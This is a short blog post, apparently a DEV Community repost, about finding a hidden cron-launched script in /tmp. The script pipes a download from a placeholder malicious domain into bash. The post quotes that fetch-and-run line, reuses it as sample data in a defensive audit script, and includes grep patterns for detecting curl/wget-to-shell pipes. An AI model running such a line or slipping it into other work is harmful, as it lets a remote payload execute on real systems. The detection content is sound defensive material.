DEV Community

Faruk

Posted on • Originally published at Medium

How I Caught a Suspicious Shell Script Running in /tmp (And What It Taught Me) | by Faruk Ahmed | May, 2025

✍️ Full Blog Content:

Intro:

Not all attacks are loud. Some just hide in quiet corners of your filesystem — like /tmp. I once found a tiny shell script there doing something it shouldn't. No alerts were triggered. No services crashed. But it could have become a serious problem if I hadn’t checked when I did. Here’s how I found it, what it was doing, and how you can avoid making the same mistake.

What I Saw:

While checking disk usage, I noticed this:

du -sh /tmp/*

One folder in /tmp was ~80MB — more than usual. Inside, I found this:

/tmp/.cache/.xsh

When I opened it:

cat /tmp/.cache/.xsh

I saw:

#!/bin/bash
curl http://malicious-domain.com/payload.sh | bash

The script fetched a remote payload every 6 hours; it was re-launched by a background cron job that had been added under a non-root service user.

What I Learned:

✅ 1. Never Ignore Hidden Files in /tmp

Run:

find /tmp -type f -name ".*"
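The check above can be turned into a small audit that also inspects what each hidden file does. This is an added example, not code from the original post: it lists hidden regular files under a directory whose contents pipe a download straight into a shell (the `curl ... | bash` pattern found in `.xsh`), and filters crontab text for entries that launch something from /tmp, the way the cron job in the post did. The function names and the sample files are constructed for the demo; the suspicious sample is only written and read, never executed.

```shell
#!/bin/sh
# Added example (not from the original post). Audits a directory for the
# pattern described in the post: hidden files that fetch a remote payload and
# feed it to a shell, plus cron entries that run something out of /tmp.

# Print every hidden regular file under $1 (default /tmp) whose contents
# contain a "download | shell" construct such as `curl ... | bash`
# or `wget ... | sh`.
find_pipe_to_shell_scripts() {
    dir="${1:-/tmp}"
    find "$dir" -type f -name '.*' 2>/dev/null | while IFS= read -r f; do
        if grep -Eq '(curl|wget)[^|]*\|[[:space:]]*(ba|z|da)?sh([^[:alnum:]_]|$)' "$f" 2>/dev/null; then
            printf '%s\n' "$f"
        fi
    done
}

# Read crontab-format text on stdin and print the non-comment entries that
# execute something under /tmp or /var/tmp. Feed it e.g. the output of
# `crontab -l -u <service-user>` or the files under /etc/cron.d.
cron_entries_touching_tmp() {
    grep -E '(^|[[:space:]])(/var)?/tmp/' | grep -v '^[[:space:]]*#'
}

# Build a throwaway directory mirroring what the post found (constructed
# sample data), scan it, and print matches relative to the temp root.
demo_scan() {
    work="$(mktemp -d)"
    mkdir -p "$work/.cache"
    printf '#!/bin/bash\ncurl http://malicious-domain.com/payload.sh | bash\n' > "$work/.cache/.xsh"
    printf 'session=abc123\n' > "$work/.benign-state"   # hidden, but harmless
    find_pipe_to_shell_scripts "$work" | sed "s#^$work/##"
    rm -rf "$work"
}
```

Run `demo_scan` to see only `.cache/.xsh` reported; in production, point `find_pipe_to_shell_scripts` at /tmp and /var/tmp and pipe each service user's `crontab -l` output through `cron_entries_touching_tmp`.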

👉 Read Full Blog on Medium Here
